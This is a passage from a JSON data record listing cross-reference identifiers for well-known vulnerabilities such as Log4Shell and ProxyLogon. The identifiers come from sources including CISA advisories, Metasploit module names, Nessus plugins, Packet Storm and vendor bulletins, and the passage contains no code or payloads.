"E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E4452F8B377A6318D5E140C5FE8BCE8A991964A95AC77F047C30B4542034429F", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F122C27179362A817F8CF31FDC2906DEDD7B8BBEA33D06FFA42180F0625D22E0", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F2901ADEFFDC496A6F27CBD82624C55C4B805D9C77EBED14A24ED2CCC730C354", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["AA20-010A", "AA20-020A", "AA20-031A", "AA20-099A", "AA20-107A", "AA20-126A", "AA20-133A", "AA20-206A", "AA20-258A", "AA20-259A", "AA20-275A", "AA20-283A", "AA20-296A", "AA20-296B", "AA21-062A", "AA21-110A", "AA21-116A", "AA21-200B", "AA21-209A", "AA21-259A", "AA21-356A", "AA22-011A", "AA22-117A", "AA22-138A", "AA22-152A", "AA22-158A", "AA22-174A", "AA22-249A", "AA22-249A-0", "AA22-257A", "AA22-264A", "AA22-265A", "AA22-277A", "AA22-294A", "AA22-320A", "AA22-321A", "AA22-335A", "AA23-025A", "AA23-039A", "AA23-040A", "AA23-059A", "AA23-061A", "AA23-074A", "AA23-075A", "AA23-108", "AA23-129A", "AA23-131A", "AA23-136A", "AA23-144A", "AA23-158A", "AA23-165A", "AA23-187A", "AA23-193A", "AA23-201A", "AA23-208A", "AA23-213A", "AA23-215A", "AA23-242A", "AA23-250A", "ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0009F92C7DBF6D1163E64AF402687506", "IMPERVABLOG:0BD55CF3ADC4FC18663ADAF4AE9272D2", "IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:937EDF98C40EFDDA392CC06661F152F0", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:D1F1D344B2FD670184AA4FB99A50BD1B", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96", "IMPERVABLOG:E3068E5C16504E4E7591776B5E79213F", "IMPERVABLOG:F193BFA34E9266EE9047B9FAB1A3A1B5", "IMPERVABLOG:FEBE35B3CF79AFD5E057AF4D43E9C08F"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "jvn", "idList": ["JVN:51106450"]}, {"type": "kaspersky", "idList": ["KLA12103", "KLA12371", "KLA12372", "KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:1567876964965286721", "KITPLOIT:1680589374755422772", "KITPLOIT:3043339745958474082", "KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864", "KITPLOIT:5104415481503400470", "KITPLOIT:6411625084720414057", "KITPLOIT:6759391622067035795", "KITPLOIT:7847586937102427883", "KITPLOIT:866017936175971203"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:69ADDAD13D83673CDE629B3AD655DD29"]}, {"type": "mageia", "idList": ["MGASA-2021-0461", "MGASA-2021-0470", "MGASA-2021-0556", "MGASA-2021-0566", "MGASA-2023-0141"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:3A629D0DB6CE0BFDB2462C4612ED19ED", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:78681A8703445F3DF21BACB3C703E8D2", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:7DC590D7CCD7B42E23F1F1008D339A41", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:8A7CCD02A4D2FFC47ACB35E63C12DA1D", "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "MALWAREBYTES:916ADA06F0F0B2E4CCBAE56C7FEA87D1", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:C4DB4BB0BFCEFD942AA15C62F18F803C", "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-", "MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_RCE-", "MSF:EXPLOIT-LINUX-HTTP-HIKVISION_CVE_2021_36260_BLIND-", "MSF:EXPLOIT-LINUX-HTTP-MOBILEIRON_CORE_LOG4SHELL-", "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "MSF:EXPLOIT-MULTI-HTTP-APACHE_APISIX_API_DEFAULT_TOKEN_RCE-", "MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-GITLAB_EXIF_RCE-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-MULTI-HTTP-MANAGEENGINE_SERVICEDESK_PLUS_SAML_RCE_CVE_2022_47966-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ENDPOINT_CENTRAL_SAML_RCE_CVE_2022_47966-"]}, {"type": "mmpc", "idList": ["MMPC:0FBB61490D4A94C83AEE14DDEE722297", "MMPC:1AFF4881941FA1030862F773DC84A4A8", "MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2DF3FD324C56807B3618640F5C3492C7", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:4C62BE50213C7726C383DAD096CBBB99", "MMPC:567C6CC66BD942B4F1BBE84ED9F6665B", "MMPC:9AAC6D759E6AD62F92B56B228C39C263", "MMPC:A086D121065A6253A8EECABD51EB16DF", "MMPC:B1806E4D7F97F83DB41A41A9BBF86D13", "MMPC:BB2F5840056D55375C4A19D2FF07C695", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "MMPC:D3341B3E36680D5272BC91A3694352AC", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F36351D1B5A5C40989F46EF8729039A7", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2021-26412", "MS:CVE-2021-26854", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065", "MS:CVE-2021-27078", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB5000871", "KB5000978"]}, {"type": "msrc", "idList": ["MSRC:11EE27B79C8FC8176F733C5748E02C96", "MSRC:543F3A129A47F4B14FB170389908717B", "MSRC:5CBA045F26BE90EBCCB3C34E5CE2A790", "MSRC:9783BD8B3A34301D0C5C34D252854BDF", "MSRC:9DA5AC102EA6224E027868594A8ED7B8", "MSRC:C6213215CC0BE4847F142F730607AFA2", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:0FBB61490D4A94C83AEE14DDEE722297", "MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2DF3FD324C56807B3618640F5C3492C7", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:4C62BE50213C7726C383DAD096CBBB99", "MSSECURE:567C6CC66BD942B4F1BBE84ED9F6665B", "MSSECURE:9AAC6D759E6AD62F92B56B228C39C263", "MSSECURE:A086D121065A6253A8EECABD51EB16DF", "MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:D3341B3E36680D5272BC91A3694352AC", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:F36351D1B5A5C40989F46EF8729039A7", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["AL2022_ALAS2022-2022-225.NASL", "AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1716.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1739.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1543.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_2_4_49_PATH_TRAVERSAL.NBIN", "APACHE_2_4_50.NASL", "APACHE_2_4_50_PATH_TRAVERSAL.NBIN", "APACHE_2_4_51.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_APISIX_2_12_1.NASL", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "ATLASSIAN_CONFLUENCE_CONFSERVER-79016.NASL", "BUFFALO_CVE-2021-20090_PATH_TRAVERSAL.NBIN", "BUFFALO_WSR_CVE_2021_20090.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "CONFLUENCE_CVE_2022_26134.NBIN", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "EULEROS_SA-2022-1276.NASL", "EXCHANGE_CVE-2021-26855.NBIN", "F5_BIGIP_SOL23605346.NASL", "F5_BIGIP_SOL52145254.NASL", "F5_CVE-2020-5902.NASL", "F5_CVE-2022-1388.NBIN", "FORTIGATE_FG-IR-22-398.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_25B78BDD25B811ECA341D4C9EF517024.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "FREEBSD_PKG_D001C189279311EC8FB1206A8A720317.NASL", "GENTOO_GLSA-202208-20.NASL", "GENTOO_GLSA-202209-02.NASL", "GITLAB_13_10_3.NASL", "GITLAB_CVE-2021-22205.NASL", "HIKIVISION_CVE-2021-36260.NASL", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOS_SPLUNK_824.NASL", "MANAGEENGINE_ACCESS_MANAGER_PLUS_CVE-2022-47966.NBIN", "MANAGEENGINE_ADSELFSERVICE_6114.NASL", "MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN", "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN", "MANAGEENGINE_SERVICEDESK_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_MSP_13001_RCE.NASL", "MANAGEENGINE_SERVICEDESK_MSP_CVE-2022-47966.NBIN", "MANAGEENGINE_SERVICEDESK_PLUS_14004.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "NUTANIX_NXSA-AOS-5_20_4.NASL", "NUTANIX_NXSA-AOS-6_0_2_5.NASL", "NUTANIX_NXSA-AOS-6_1.NASL", "NUTANIX_NXSA-AOS-6_1_1.NASL", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2022-0038-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "SITECORE_XP_SC2021-003-499266.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "SOLR_CVE-2021-44228.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_67_U3O_VMSA-2021-0020.NASL", "VMWARE_VCENTER_70_U2C_VMSA-2021-0020.NASL", "VMWARE_VCENTER_CVE-2021-22005.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113014", "WEB_APPLICATION_SCANNING_113015"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2022", "ORACLE:CPUJAN2022", "ORACLE:CPUJAN2023", "ORACLE:CPUJUL2023", "ORACLE:CPUOCT2022"]}, {"type": "osv", "idList": ["OSV:CVE-2021-41773", "OSV:CVE-2021-42013", "OSV:DLA-2842-1", "OSV:DSA-5022-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154176", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:158333", "PACKETSTORM:158366", "PACKETSTORM:158581", "PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938", "PACKETSTORM:162610", "PACKETSTORM:162736", "PACKETSTORM:162976", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:164418", "PACKETSTORM:164439", "PACKETSTORM:164501", "PACKETSTORM:164603", "PACKETSTORM:164609", "PACKETSTORM:164629", "PACKETSTORM:164768", "PACKETSTORM:164941", "PACKETSTORM:164988", "PACKETSTORM:164994", "PACKETSTORM:165085", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:166167", "PACKETSTORM:166228", "PACKETSTORM:166328", "PACKETSTORM:167007", "PACKETSTORM:167118", "PACKETSTORM:167150", "PACKETSTORM:167430", "PACKETSTORM:167449", "PACKETSTORM:167917", "PACKETSTORM:170178", "PACKETSTORM:170882", "PACKETSTORM:170925", "PACKETSTORM:170943", "PACKETSTORM:171626"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "photon", "idList": ["PHSA-2021-0118", "PHSA-2021-4.0-0118"]}, {"type": "prion", "idList": ["PRION:CVE-2021-1497", "PRION:CVE-2021-20090", "PRION:CVE-2021-20122", "PRION:CVE-2021-22005", "PRION:CVE-2021-22205", "PRION:CVE-2021-26084", "PRION:CVE-2021-26412", "PRION:CVE-2021-26854", "PRION:CVE-2021-26855", "PRION:CVE-2021-26857", "PRION:CVE-2021-26858", "PRION:CVE-2021-27065", "PRION:CVE-2021-27078", "PRION:CVE-2021-3100", "PRION:CVE-2021-36260", "PRION:CVE-2021-38703", "PRION:CVE-2021-40539", "PRION:CVE-2021-4104", "PRION:CVE-2021-4125", "PRION:CVE-2021-41773", "PRION:CVE-2021-42013", "PRION:CVE-2021-42237", "PRION:CVE-2021-44228", "PRION:CVE-2021-44530", "PRION:CVE-2021-45046", "PRION:CVE-2022-0070", "PRION:CVE-2022-1388", "PRION:CVE-2022-23848", "PRION:CVE-2022-24112", "PRION:CVE-2022-26134", "PRION:CVE-2022-33915", "PRION:CVE-2022-42475", "PRION:CVE-2022-47966"]}, {"type": "ptsecurity", "idList": ["PT-2020-01", "PT-2020-04"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "QUALYSBLOG:0EAB7251347951045CAC549194E33673", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:56A00F45A170AF95CF38191399649A4C", "QUALYSBLOG:5F3A665821FA30373004EC52F5104E15", "QUALYSBLOG:5FAC1C82A388DBB84ECD7CD43450B624", "QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:78A056D339E07378EFC349E5ACA8EC30", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:B0EFD469309D1127FA70F0A42934D5BC", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:F9C2629D40A6DC7640DB3D6BD4FB60B3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:3801C6C4728415BDC9A56A2258BD827B", 